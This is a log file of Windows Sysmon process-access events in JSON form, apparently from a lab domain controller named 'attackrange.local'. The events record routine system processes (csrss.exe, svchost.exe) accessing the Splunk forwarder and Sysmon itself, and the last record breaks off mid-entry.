{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1690,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010FC670300}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010FC670300}","TargetProcessId":"3928","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1691,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1692,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1693,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1694,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1695,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1696,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1697,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1698,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 